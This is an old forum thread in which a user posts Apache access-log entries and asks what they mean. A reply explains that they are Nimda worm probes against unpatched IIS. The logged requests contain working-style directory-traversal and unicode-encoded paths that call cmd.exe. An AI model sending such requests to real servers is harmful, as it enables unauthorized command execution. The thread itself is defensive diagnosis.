• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 153
  • Last Modified:

security problem, fix?

I'm getting a lot of GET requests from one particular IP addy, but I'm not sure what he's trying to do.  Here's some of the log entries:

68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:46:58 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.83.207.195 - - [24/Feb/2003:13:46:59 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:02 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:07 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

=========================================

Please tell me what he's doing and what I can do to stop anything malicious.  I'm running XP with the latest Apache.

Thanks,

(This questions worth a lot of points)

Jason
0
yodaj007
Asked:
yodaj007
1 Solution
 
linxitCommented:
Hi,

This is the NIMDA worm in action - basically someone is running a non-patched IIS server which has been compromised by NIMDA and is trying to attack you. Don't worry, Apache is immune to it.

The patch has been available now for over a year so there's no excuse really on their part.

Unfortunately the hostname attached to that IP address (pcp02763091pcs.pthurn01.mi.comcast.net) suggests it's just a home user who probably doesn't even know he's running a webserver.

Andy
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Tackle projects and never again get stuck behind a technical roadblock.
Join Now